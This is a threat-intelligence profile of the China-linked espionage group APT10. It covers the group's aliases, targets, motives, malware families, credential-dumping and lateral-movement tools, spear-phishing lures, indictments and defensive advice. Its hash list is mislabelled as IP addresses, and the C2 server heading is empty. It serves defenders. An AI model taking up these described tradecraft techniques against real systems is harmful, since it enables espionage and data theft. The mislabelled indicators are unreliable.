Threat Actor Profile
Origin: China, 2009
Aliases: Cloud Hopper, Red Apollo, CNVX, Stone Panda, MenuPass, POTASSIUM, MenuPass Group, APT 10
Key Target Sectors: Construction and Engineering, Aerospace, and Telecom firms, and Governments
Attack Vectors: Spear phishing, Spam Email, Data-theft, Typosquatting, Unauthorized Access, Phishing, Backdoor
Target Region: North America, South-East Asia, Eastern Asia, Western Europe
Malware Used: Haymaker, Bugjuice, Snugride, QuasarRAT, RedLeaves, PlugX, PoisonIvy and ChChes
Tools Used: Certutil, Cmd, Impacket, Mimikatz, Net, Ping and PsExec
Vulnerabilities Exploited: Eternalromance Exploit (CVE-2017-0143)
APT10 is a cyber espionage threat group that originated from China and is active since 2009. The group has been taking interest in various sectors, including defense, healthcare, government, and aerospace. Between 2016 and 2017, the group was observed targeting managed IT service providers, manufacturing and mining companies, and a university as well. Recently, in April 2019, its activity was seen again in Southeast Asia, a region where this APT frequently operates.
Which organizations have they targeted?
APT10 is primarily known for targeting US government and defense industrial base organizations, with the earliest known activity traced back to December 2009. It has also been observed targeting organizations in Japan, United Kingdom, India, Canada, Brazil, South Africa, Australia, Thailand, South Korea, France, Switzerland, Sweden, Finland, and Norway. Between 2016 and 2017, the group targeted manufacturing organizations in India, Japan and Northern Europe; a mining organization in South America, and various IT service providers worldwide. The group was probably also involved in the data leaks of Japan's major business lobby Keidanren in 2016. Later in early 2018, the APT10 was seen again carrying out a cyber attack against the systems used in the Pyeongchang, South Korea, WinterOlympics 2018 (using EternalRomance SMB exploit). Numerous small code fragments scattered throughout different samples of malware were found in these attacks, which were uniquely linked to APT3, APT10, and APT12. In April, APT10 was found stealing financial information from US firms, seeking to give domestic Chinese enterprises an edge in international deals, along with getting information about Tokyo's policy toward resolving the North Korean nuclear situation from Japanese defense firms. At the late-2018, it was also revealed that around nine global Managed Service Providers (MSPs) including Hewlett Packard Enterprise and IBM were compromised in attacks by China's APT10 group. Recently, in April 2019, new activities were detected in the region of Southeast Asia, where new malware variants linked to APT10 were discovered.
What is their motivation behind the attacks?
APT10 focuses on strategic intelligence based targets related to trade negotiations, development, and research in competition with Chinese commercial entities, and high-value counterintelligence targets overseas. The targeting of these organizations is supported by Chinese national security goals, including obtaining valuable intelligence and military information as well as the theft of secret business data to support Chinese corporations. The group has traditionally targeted at scale when attacking commercial enterprise. However, at the beginning of 2018, they’ve begun devoting a portion of their operations to target Managed Service Providers (MSPs), most likely to exfiltrate sensitive client data.
APT10 attack methods include use of both traditional spear phishing campaigns and backdoors to penetrate inside the targeted network. APT10’s spear phishing attacks have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g.[Redacted]_Group_Meeting_Document_20170222_doc_.exe) and in some cases identically named decoy documents and malicious launchers within the same archive. In addition to the spear phishers, APT10 was also observed to target victims through global third-party service providers.
APT10 originally used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardizing their command and control function. The 2016 attack on TeamViewer, in which the hackers breached their network using Winnti (backdoor), was also believed to be linked with this group. APT10 ceased its use of the Poison Ivy malware family after a security firm comprehensively detailed the malware’s functionality and features. In late-2018, the group updated their attack techniques, like the spear phishing emails, were now carrying malicious Word documents that attempted to deliver the UPPERCUT backdoor. The password protected documents carried a malicious VBA macro and used Japanese titles related to maritime, diplomatic, and North Korean issues. Recently in April 2019, the group was seen using fake or misspelled domain names similar to real, legitimate tech companies (a method known as Typosquatting) and also using C&C servers located in South Korea. In May 2019, a Linux version of the Winnti malware was identified in a cyberattack against Bayer. This Linux version of Winnti comprised of two files: libxselinux (the main backdoor) and libxselinux.so (a library used to bfuscate its activities).
Known tools and malware
The group has devoted their resources to increase the capability of their malware known as Haymaker, Bugjuice, Snugride, and Quasarrat. The group's malware can be classified into two distinct areas: sustained and tactical. The tactical malware, EvilGrab, and now ChChes (and likely also RedLeaves), are designed to be lightweight and disposable, while the sustained malware, Poison Ivy, PlugX and now Quasar, provides a more comprehensive feature set.
Malicious programs used by APT10
- Haymaker - A backdoor that can execute and download other payloads in the form of modules.
- Bugjuice - A backdoor that is executed by launching a benign file to hijack the search order for loading a malicious DLL into it.
- Snugride - A backdoor that communicates with its C2 server via HTTP requests.
- QuasarRAT - A fully functional .NET backdoor, which has been used by multiple cyber espionage groups in the past.
- RedLeaves - A malware family, whose code overlaps with PlugX and os possibly based on the open-source tool Trochilus.
- PlugX - A remote access tool (RAT) that uses modular plugins.
- PoisonIvy - A popular remote access tool (RAT) that has been used by many cyber espionage groups.
- ChChes - Trojan that is believed to be used exclusively by APT10.
- EvilGrab - A malware family with common reconnaissance capabilities.
- PowerSploit - An open source, offensive security framework, that comprises of PowerShell modules and scripts.
Known Commercial/Open Source Tools used by APT10
- Certutil - A command-line utility that can be used to obtain certificate authority information and configure Certificate Services.
- Cmd - Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities
- Impacket - An open source collection of modules written in Python for programmatically constructing and manipulating network protocols.
- Mimikatz - A credential dumper, capable of obtaining plaintext Windows account logins and password.
- Net - A utility component of the Windows operating system.
- Ping - An operating system utility commonly used to troubleshoot and verify network connections.
- PsExec - A Microsoft tool that can be used to execute a program on another computer.
- Pwdump - A credential dumper used to dump passwords.
In Dec 2018, two individuals, named Zhu Hua and Zhang Shilong, were charged with hacks of more than 45 technology organizations and government departments operating in the USA. The duo, thought to be associated with APT10, worked for Chinese organization "Huaying Haitai", and also worked with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau (TSSB). They were mainly assigned the task of stealing data from targeted organizations. The pair was also accused of hacking a large number of managed service providers from 2014 onwards, that were remotely providing IT services for various prominent customers. The hackers were behind the data on a vast number of industry sectors, including satellite tech, aviation, pharmaceutical, mining, manufacturing, production and oil/gas exploration. In the process, they eventually stole hundreds of gigabytes of critical data.
Organizations should deploy reliable antivirus solutions to guard against the known malware, which are commonly used by APT10 to penetrate the targeted network. Application control or application whitelisting tools can be useful in preventing any unauthorized executable from executing, which are mostly spread via spear phished emails. With smart usage monitoring tools leveraging orchestration
technology, IT teams can detect any unusual behavior, prevent it, and contain it from impacting critical systems of organizations. Sharing of Strategic and Tactical Threat Intelligence
with trusted partners, ISACs and regulatory bodies can also help organizations develop and practice shared strategies for combating such threats. Finally, automated maintenance using a reboot-to-restore software can help ensure clean configurations. This can also prevent the inactive threats to remain hidden or propagate inside a network for a longer duration.
Indicators of Compromise
Originating IP Address
0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded 96649c5428c874f2228c77c96526ff3f472bc2425476ad1d882a8b55faa40bf5 c8d86e9f486d23285b744279812ef9047a0908e39656c2ea4cdf3e182f80e11d f13536685206a94a8d3938266f100bb2dffa740a202283c7ea35c58e6dbbb839 e0f91da52fdc61757f6a3f276ae77b01d2d1cc4b3743629c5acbd0341e5de80e 02b95ef7a33a87cc2b3b6fd47db03e711045974e1ecf631d3ba9e076e1e374e9 29b0454db88b634656a3fc7c36f318b126a83ae8fb7f73fe9ff349a8f8536c7b 41542d11abf5bf4a18332e9c4f2c8d1eb5c7e5d4298749b610d86caaa1acb62c
Winnti Command and Control Servers